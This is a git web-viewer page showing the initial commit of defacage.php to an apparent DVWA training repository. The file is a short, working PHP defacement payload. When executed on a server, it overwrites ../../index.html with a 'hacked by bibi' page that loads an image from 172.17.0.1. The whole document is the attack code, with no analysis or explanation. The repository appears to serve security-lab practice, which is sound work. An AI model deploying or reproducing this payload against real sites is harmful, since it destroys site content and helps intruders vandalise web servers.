summaryrefslogtreecommitdiff
path: root/defacage.php
diff options
context:
space:
mode:
authorjerome <jerome@xlinfo.fr>2023-09-19 17:02:40 +0200
committerjerome <jerome@xlinfo.fr>2023-09-19 17:02:40 +0200
commit2585495cfab54366a668777216b88a4f4b686102 (patch)
tree9487b4d11eba4f46566a4a99bcef512d79717e74 /defacage.php
downloaddvwa-2585495cfab54366a668777216b88a4f4b686102.tar.gz
dvwa-2585495cfab54366a668777216b88a4f4b686102.zip
commit initial
Diffstat (limited to 'defacage.php')
-rw-r--r--defacage.php15
1 files changed, 15 insertions, 0 deletions
diff --git a/defacage.php b/defacage.php
new file mode 100644
index 0000000..48f73ad
--- /dev/null
+++ b/defacage.php
@@ -0,0 +1,15 @@
+<?php
+$html='
+<!DOCTYPE html>
+<head>
+<meta charset="UTF-8">
+<title>HaCkÉ pAr BIbi</title>
+</head>
+<body>
+<h1>T\'es HaCkÉ par bIbI! </h1>
+<img src="http://172.17.0.1/hack.jpeg" alt="" />
+</body>
+</html>';
+$fp = fopen('../../index.html', 'w+');
+fwrite($fp, $html);
+fclose($fp);